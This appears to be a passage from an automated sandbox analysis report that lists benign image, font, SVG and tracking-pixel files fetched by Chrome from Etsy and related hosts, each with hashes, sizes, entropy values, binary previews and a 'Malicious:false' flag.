                                                                                                                                                                              SHA-256:34E6CF49E4A0448A20C3918AA7BAF27D11CD62E3864E767DDB6929A8D98FED8A
                                                                                                                                                                              SHA-512:6F482C24443A04EE90DB93ADFF87D9EEAB6473CEEF50AD5393839B3D0037DFA8B4750A38B76603C2363AEA571DD6208A34CC6AB3BA0A1194EF36E565652C83C4
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......,.,..".........................................G........................!..1A.Qa.."2q.R...#Bb...r.$3C..S........%cs..................................6........................!1A..Qa"2q......#B...$3Rbr..............?...GJ.D....H.....X..V(.E".=(r......R...z,R"..r.R.q.Xs.(.AXb..z.......G....g
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 15688, version 1.0
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):15688
                                                                                                                                                                              Entropy (8bit):7.988326247468704
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:AA23B7B4BCF2B8F0E876106BB3DE69C6
                                                                                                                                                                              SHA1:106AC454BA4E503E0A1CD15E1275130918049182
                                                                                                                                                                              SHA-256:CC46322D5C4D41DA447F26F7FA714827F2EC9A112968C12EF5736C7494985ECA
                                                                                                                                                                              SHA-512:4B46D59BA6C76E5F30C89A5BB3F96F7A72BD7D60CFCAD7D48638059D60EC61A317A40DF70BB1CD2F2A477DE1BB0C2399C671880C2981779DF6AF99043043B46C
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://static.captcha-delivery.com/common/fonts/roboto/roboto.woff2
                                                                                                                                                                              Preview:wOF2......=H.......t..<..........................d..d..^.`.. .T..<.....|..{........6.$.... ..t. ..I.3....K..@..}. #...06x=2....J......r.....j.%2[.].[.\tG....%*".&..u''Y..Ot..b.....y2._c_........]..|."[........Um..SB_om.N..+;..F.$'/...............ef.........]...|...s'z..DO.T..8u..q8..znb.-05.Y....+..{u.4.K..7.%..t..BX.6U...T.z|=.U~.....i.....Mk.R........>.....S..._b.x...L..t'....?.{.D@.Q x.7/c..d..p..#.x...y..E ..6..e..9]0n.....q..G2..x.N.....t.3:..h......W.Z...}@..`.4.....A.:}:*.;C....~....QMT*.N.3.....i.%....F..P...j...Ep.%h.......lg4.bhv//{a'.n.n...(.../k%.H.......C.Gd....`...".:`..n...(.T!....PZ..N".....E.Z..4.1h.........r8.0........m.f...-k.. R.#.i.H=....J0.Jim..w!>.@......Z.3...Uv8....!23[..7?k...s..H. .[........E...y.H.......Ln?.cyb........]...d.b..$]:H.|.B. $$.R. .. =.....................V..u...L'...c...@.I.I.@.......G.c..QH .=..n#Z$.n...Y........?^...M.<2^.`.H........&.J.GKn`Jnx0..m)..0.U..a......}.....C.Q.....XB@a..G.4...(Q.F..MZt..g...k..8q....o
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):1720
                                                                                                                                                                              Entropy (8bit):7.616828388861877
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:84330E331950F4509C5BF1DE41455A11
                                                                                                                                                                              SHA1:EAF4AA9FE4275DBB8182433FDDD66BCA2C83AD75
                                                                                                                                                                              SHA-256:35DD8E6D8E124E39C15076F11A0EA8C227C558E6EE2A090CAEC6D8B725D1B103
                                                                                                                                                                              SHA-512:2D9CB659C510765D90C61EE58526B6607E95FC06AE14D33C6FB15D01ACEFD130138FB8EA636EF9113E60C4BCA362A26699463AFE4E8825395B19AC763BCA1A65
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/9871582/r/il/c7cdfa/6198061431/il_100x100.6198061431_r2hd.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@.......................#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......d...d....pixi............ipma...................mdat........`...B2...P..<.@.+R.....4...z...@E+K....d8.?...A.c...%fo}..".'..,..q.....W.DI.mH...P..f..X..%.A..L8.W..A.9.+q,.t.Aj.{u....v..n....Ph..du4......U..I...;Q...}.5...O0t=..D...9t./.z|O..."~.......d..df..}Np...`....[.!4....J....8....h..c..b`U.`.,R..V.J.g..q..........HH....m.">m0..E. f.(3nH0;.<T..Z8._7......V.j.G.3.....tP..6.Y.)..<Ew.dEw)].......K.U."X.h.*.J.'.&`.f..%....l.xt.+.DIXV<...0.. /.....C.kz...ci....V.>bN%.......U.....Xje..\..s.OQ..R...'x.....4.z4..j...4....N@..x...[,.'.+.U.~a.aQ^....._.....[.Q....e..-}T`.....=7W.KF..Q.fAq,.C....ju.."..M.m1..K..ai,3......U0............q.t.....y....9..5.......%.9..c...O;.N.....a....g..|w...#....?..('...M.E.Bu.....*.._I....'[{*....I...V\...5...
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):44
                                                                                                                                                                              Entropy (8bit):2.7595682659220433
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:0A4ACB4CADD9EDFF48582F38D8CF459F
                                                                                                                                                                              SHA1:498D74466C3EF6F5AAF60F9F4B943C66D37B2B41
                                                                                                                                                                              SHA-256:0451A2128BB6496A46D72F584BE7970D1D90FF580EA1E6FA2B07B2632B1D74F5
                                                                                                                                                                              SHA-512:82E797977EDBCE1AC39C239F72E2DB7A4D521A90F26E7C395DC5DF340165E4C9B02CAD6C4899F4ACDC826182BB81AD0028D23E36F6BA6EA5687AF0C9B75F83D0
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://pixel.streetmetrics.io/pixel/62f2e71d-3885-4822-ba89-6e017b2f1a1e
                                                                                                                                                                              Preview:R0lGODlhAQABAAAAACH5BAEAAAAALAAAAAABAAEAAAI=
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 50x50, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1931
                                                                                                                                                                              Entropy (8bit):6.884139512967643
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:A5A68EC6224C6ABB5C27BC6FA83876B3
                                                                                                                                                                              SHA1:2332B32FCDD725F247C40E715734490B062CC3A1
                                                                                                                                                                              SHA-256:C9E06352B225F11ED79B8249E429C739E4165A42C5A1E6EC85FD224D76F58871
                                                                                                                                                                              SHA-512:70815C3A16562260CFCEFEF09050807ACEF610289F13BB62B726BD8B6E6DCE1A6BDA6792F642272016E43379FBD0C7C0B25DBB774DD500F8B45BDE9057ED8B1D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C.................................................."..."*%%*424DD\...C.................................................."..."*%%*424DD\......2.2.."........................................-........................!..1A."Qa..q.2..B..........................................................?..=.....t..NVC...(..A..!.....'....n.,....8.>F.Y.....|.'..&....H9'!..'.:...Iu......'J&Bs"..{.#...b....oJ......<m.....T.......&Oi..<.z..[..
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):68531
                                                                                                                                                                              Entropy (8bit):7.960880152122118
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:2C29C41D873298EAFFAE4843C7F3B198
                                                                                                                                                                              SHA1:A311E5E7C9613619F01AB2F57D42477744CD5242
                                                                                                                                                                              SHA-256:43E4669D0EEBC0768623039700E123035369F04B5284175E790343E7F282D958
                                                                                                                                                                              SHA-512:4B97F2E442E527537292770B1A70B7502BBDAFE9CA46F9609C5D22325FEDAFD69F6E25FC900DA5609CF68F3E14AAB79703703C2F9D1A2234A97856B3BC6462FD
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......X.X..".........................................A.........................!.1A."Q.a.#2q.B..R...3b..$r...C.%.4cs................................6......................!.1A.Qa."q.2......#Bb3Rr.$c...............?..t..e...p.;UW...."ML1..,[..5...S......!........,....9%...5....$.......o.%...
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):46660
                                                                                                                                                                              Entropy (8bit):7.965831659224929
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:BC561751AE244B6E1BAEAE16A88C523E
                                                                                                                                                                              SHA1:787D2CFBEF7FBEACC787D367BF4751D27326F8F5
                                                                                                                                                                              SHA-256:A864DB22197DF6670892AA4D32EB33828BAD74B26772403E26CDB1583979C279
                                                                                                                                                                              SHA-512:C75F2D8071889A573D380A3C12C04ECDAFC99AC047C2292D974731134F71A5C9965D6E8B9B90B3E2C6294C5A89BEA211F0566AD34B43E24A661E372DA747431B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......X.X..".........................................U..........................!1AQ.."aq.....2R....#$B...3Cbr....6DSt..%&45Tc......ds..................................?.......................!1...AQaqr...."234BRs...#S...b..$Cc..............?..M.uSdX.....J(@J".....P....E.: ..8.%7P.@OE*.>.....)Q
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):119455
                                                                                                                                                                              Entropy (8bit):7.965721159544305
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:946999B819C1D63D509DC52D5B6D3F18
                                                                                                                                                                              SHA1:B63AE220794027E6D527B438B850676D05FC972D
                                                                                                                                                                              SHA-256:ECE3DD5EA0808F45DE40AB3ACD25B8BFECDB0705939A2B5B4139E042DDC940DF
                                                                                                                                                                              SHA-512:0C22F8A9505351456B89E7A403BD409C1795738F99A85B642D6475FBC10F83509A62CF224784FD0CBD757B4B42299BABB6E6B1C52F07397ACAE1A938AAD370B4
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C.................................................."..."*%%*424DD\...C.................................................."..."*%%*424DD\......X.X..".........................................M.........................!.1."AQ..aq2...#BR.3br..$.....CSc...%s...4DT..5..................................0.....................!..1AQ.aq."..2.B......R.b............?...J.x:v........](....<...X.?..@..tn.Q.p..q..u..6.f.B.=......\gO..U..Y.{.8....
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 170x135, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):10622
                                                                                                                                                                              Entropy (8bit):7.870268073072073
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:6F5E140C31556896EA136FC824AD0C34
                                                                                                                                                                              SHA1:61B8B1FD9E7CCC46B9FF9392C35E494B8BDA7F04
                                                                                                                                                                              SHA-256:307C4FB506D2F7029AD13630DE9CB47E78B05C48BA6370969F07973A2600D903
                                                                                                                                                                              SHA-512:6A9FB4AFC0046F8CD263B7299BB80211B798117C881D1CE041098E95E3E17F9244951EC4BC34F21F5ED2E85F941432D0A20EF662A1AF0089A11314F23162E3BC
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd..........."........................................@.........................!.1."AQ..aq2....#BRbr...3...$4..%C.................................3........................!1AQ.aq"..#2...B...R..b..............?...n..Xbj..:'u..4.#)#.....=Ob...YUx.S..#.4y....$..7...(..zVK.....&Z...v...._.j='RV..
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):12435
                                                                                                                                                                              Entropy (8bit):3.7259856763143135
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:7D18318794284495D99518FD0A6D45C8
                                                                                                                                                                              SHA1:3CA1685750869289C6333109B09F13D133A215B8
                                                                                                                                                                              SHA-256:B155A5DD52F340B45994C757941875FB63FF2AAF6947CB283D27C55E20BFE835
                                                                                                                                                                              SHA-512:1074CF6ECC53B675ACFD4C19B92A82C0391FADD8C97802DACF983A43610A2E9FE852CDC9894DFD14D9EA6DC67F379827E5DF933A50E0B6C7463CD1894632AA5B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://www.etsy.com/assets/type/etsy-icon/clg/core/all_stars_sprite.svg
                                                                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="2 2 112 264"><path d="m20.828 9.155-6.008-.528-2.36-5.545h-.92L9.18 8.627l-6.007.528-.284.876 4.548 3.954-1.353 5.87.744.542 5.172-3.1 5.172 3.1.744-.54-1.352-5.871 4.548-3.955-.284-.876Zm22 0-6.008-.528-2.36-5.545h-.92l-2.36 5.545-6.007.528-.284.876 4.548 3.954-1.353 5.87.744.542 5.172-3.1 5.172 3.1.745-.54-1.354-5.871 4.549-3.955-.284-.876Zm22 0-6.008-.528-2.36-5.545h-.92l-2.36 5.545-6.007.528-.284.876 4.548 3.954-1.353 5.87.744.542 5.172-3.1 5.172 3.1.745-.54-1.354-5.871 4.549-3.955-.284-.876Zm22 0-6.008-.528-2.36-5.545h-.92l-2.36 5.545-6.007.528-.284.876 4.548 3.954-1.353 5.87.744.542 5.172-3.1 5.172 3.1.745-.54-1.353-5.871 4.548-3.955-.284-.876Zm22 0-6.008-.528-2.36-5.545h-.92l-2.36 5.545-6.007.528-.284.876 4.548 3.954-1.353 5.87.744.542 5.172-3.1 5.172 3.1.744-.54-1.353-5.871 4.549-3.955-.284-.876Zm-88 24-6.008-.528-2.36-5.545h-.92l-2.36 5.545-6.007.528-.284.876 4.548 3.954-1.353 5.87.744.542 5.172-3.1 5.172 3.1.744-.54-1.352-5.871
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 50x50, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):952
                                                                                                                                                                              Entropy (8bit):7.764061485100943
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:3EF0C7044953C40C164DAAB4E6152A4E
                                                                                                                                                                              SHA1:5D5EEBC78C2220AF596C6E663CCD5814C6168A75
                                                                                                                                                                              SHA-256:D38E960E07B2DCC93CD2D04740DEF04DF7D54318A9F17974C903F0A1A2BCD3D5
                                                                                                                                                                              SHA-512:A93FD8C1BC8343BA191928E3410F663C6CF4A9BB70575B28126E93560EE0D26F5C50E09EEB923E0F72601ACF30822A2F0D30CB1214B57FF3EF167BE9A3FD0655
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/iusa/d0e9db/77796042/iusa_50x50.77796042_6vw5.jpg?version=0
                                                                                                                                                                              Preview:RIFF....WEBPVP8 .........*2.2.>m0.F.#"!......i.....\..L......g.4..K...~...>:7Y..{(n..m.._.c.t... .*....2.N.K.....1...u...9....E..{$N...Ow.8.....\..:....F..:z.N........o.>Y..WB2..2.$>..F....3o....g*..l.O'...BG.D...o[.HV.#6p<.:.K.v.K4...RG....."....k.n1B......O....j...8...Ue5G..;,.-..2;.<.vr..8.G........wEA....$.l..MI:....4."...\...X...5....k..nZ..6..e...gY......s...zA{...Sl3.Z=M.@.Li.....:...|...;I.@...\...}.T.,H.....DG.'...=...k.|.&8].c..N.......gt.AT..z>H.p8........6....B.X"..A#E..a.T.+.vN..8..H,..Z.TcQ..`...H9I@..|I.oB..Y..Q..0.]^..z4.....S.k....p.W....o1.....]..tu.(...&.<..$.3......\....$..U......r.........I..CL..^.:....R.N.*..f.`.V8,$.......z.u..H.u..}....'..[.).n7..Y.....B.R_.n.1i.h..O.|......o..........c...H.... 4V..vR..!.<...^..[..${.$.........g.....Iy_$y.I...~...7@..H.....q."..p.X.."~.}..PHS..q`K..J.8./.|..-X.N........%..R..\..L.....[.r.)..3.\.....\#....3.|.=e...x...Y.d#......
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):2578
                                                                                                                                                                              Entropy (8bit):7.771334641104099
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:19F39F191C4AA73F37DC8C7306715B13
                                                                                                                                                                              SHA1:F67365DB8707697AD7807B7E88AF2287542E9BF0
                                                                                                                                                                              SHA-256:097441A57793A42315A6FC91AD1F7BC1E38E715898E47D9F68D8CBFBB9CAC449
                                                                                                                                                                              SHA-512:962E15D323772B343A338DEF580E7A81A069571615EC22A077A953DB877FAC231F1444055DBB9526E6DD93C7CF1A5FD81175A1F5C6F3752828B706753A44BD72
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/41101072/r/il/89f94d/6238137963/il_100x100.6238137963_8wak.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@.......................#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......d...d....pixi............ipma...................mdat........`...B2...p.E.Q@.+.....Z.+......8..p0X4.b...E....p.'....=.....@.)Z..D.f...Q.m.j.B|.E.K..%.U..P.-.Tk$.S....E"..v.]#~...gy.%...b.@.l{.oX....2..e-...Le......+........29.d...........L.c.}..1:.......uq =q.K.......I=...K.di.S..m..Y..P:I.4...F....38#.../.-...>:.'.$+..w...Q.M..Tw.U.a..,.e;.DY..W...?.....86.;.a....=..o.......iR......(..}V..Q62.......99.'zO...#.1.....4.DGm..z..^..e........(o.:V9Hw-J...'nr..,_<..|...rp....y.d......R...&....V'Vi"%.f.`.X-.I.K...+.q_....t.1`..y.....G....M..Z.Bh....,*.fP0...rKw-.6n......O...P...4.~.R=......]...&.._.|F.:;..jk......Q..;@h..%...-..43..m......T..I..A|.4k|...Ig..#.1......W....i.......S.(.whX........A..8..GR?.|....T...` _...xV.Z..h.r.g.6.K.j...
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):617
                                                                                                                                                                              Entropy (8bit):6.385951440746042
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:1BC3341FC5A212017DB60C7694089FCE
                                                                                                                                                                              SHA1:64200FC99013CE325FFE29212C378A15C7B18708
                                                                                                                                                                              SHA-256:F0575302A392619EB391F316B0023A34CD740B5BBC6281FD1732967CE4E2FA1A
                                                                                                                                                                              SHA-512:16AE095E719588E099A338CBF871411FB4A06875A0B28A47FC2BCC15843E075C1D10E8E86569D0F18E1DCEF477714F5A3C93F752A203EB0CCA634932E4126FF0
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/18152467/r/il/b5110b/4811337431/il_50x50.4811337431_no2s.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@...................[...#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......2...2....pixi............ipma..................cmdat......q.....2.....$.E..+E.s.S....q).][......D.z.....9...a.s.|....f.-O.JF.\m..!.3..&...U.=...X....Y"..$l...!.".A....E2....].E:P.C...Az....\..,..)..[.Bx..Yo\J.`/dh..[~..y7...rE..uR...;B..~]$....h..:......2.A.....;^`.\.10.;..$...52Lh ...B.$.{.u.1.);Ua.e.=...yg..N._v.....#k..MC...Z..1...0.}`...o9k.. "e.-?...l..LkI1!Y..../..]z....LhR.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):75076
                                                                                                                                                                              Entropy (8bit):7.997092567715022
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:6FEA41123407BCA773699E8561C2BD23
                                                                                                                                                                              SHA1:E20B8BD547AAE5AF502DED722D339FCFC025FB44
                                                                                                                                                                              SHA-256:62197B533B6533A423A3F6A0ECCBA8AF18562A34676777DC5019DAE6EA0D53F3
                                                                                                                                                                              SHA-512:65756A9CAE5F968DCD9487E952A17A616686AF81008AA361F73204892649A346F22E152BB87C6BAA44559117BE71BDA3224EFE782843DB4557A800B9B59FC1D0
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/iap/b0fb8c/5416653292/iap_600x600.5416653292_oqw1pl5b.jpg?version=0
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@..................$6...#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma.................$>mdat.....&ey_.....2.... ...A@..K7.l..X.P<h.D.].q..w!..?.v.W.`..T...t|.o..8..a.T.......!..wh..!-......'Q..0.A....[..H.rO....l.mx..qR.J.:,._......E.9Q.QG .i.....).(.xN.OK>...NhC...~....i...xC'......6.%.T.[..mc....H..eu...g.l..`.ec..F.....O....LC-R7<...3h..l.@C...B.....J."......>..T..qgbd..(....i>.l.....p..v3.-..}c.R&..U.9.Qw.....{...w.....fT......U.>\S....|.e..S.......94P.L..;$.0....D3.....k...+..l#(........K.....t.`..M..o..>.f...2.'.\.g4..8a3..F0....1...P.."....M....Z3.\.CM0....%,..y*.>.u7.8......&!n.N..{.....0.d~....Ui...VQ....9j\.~...:.:....?>.,_KN...v...uz../4......._g).....!.Tx......&.I.vR.w.CCi."...Y...W.T.O........p.6..@...U...$U.|....+...OTG_.J..}y.....Lh../s...1......{.,.&e...U..L.v.:..@..?.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):97240
                                                                                                                                                                              Entropy (8bit):7.96465083301746
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:924F2C4F7AD116FF3E917A27B8FA9FCD
                                                                                                                                                                              SHA1:2E9093FD2E805117DAD8BAEB0A6A1E4103C420E8
                                                                                                                                                                              SHA-256:A8A8557AC6DAC7619641E9A87412F92E0304CBF4E65D8586A3AC4CE1B13B5EE1
                                                                                                                                                                              SHA-512:4D4CF2F473829111BF30A6CDB307A5EC541FE2169AEF45F240BE6C93C9973B69FE14E0C7CB399CF4D7F169EDDF61D48A9319C087147A5D10EECE71F5E8C76C29
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C.................................................."..."*%%*424DD\...C.................................................."..."*%%*424DD\......X.X..".........................................J..........................!1AQ.."a.2Bq#R...3b..$r...C..%S...4.&c.5D....................................5........................!1.AQ.."2aq.#B..R...$3Cb...............?.n.:........j...ZnGH.L..RA....>.].9....q......_.......q....(..V.4...
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):138105
                                                                                                                                                                              Entropy (8bit):7.97787410450104
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:95B74572209A66D1C301B21DAE6D5026
                                                                                                                                                                              SHA1:8AB6A7B081504D2EECFB70191094B764F2D2F4A4
                                                                                                                                                                              SHA-256:4CFC65BB47FE8E30612F1CD0604170DB6FA6D2B73B60BC363A77F36407BA9434
                                                                                                                                                                              SHA-512:540E87DA9480BC4BC8492DBC672C853957BF5439B741E9B8635FFC0B1058354CDDBB7BB367E6E42EC7BCE02A8ED34629F23EB30B225508C73E866B98DC9F13AE
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
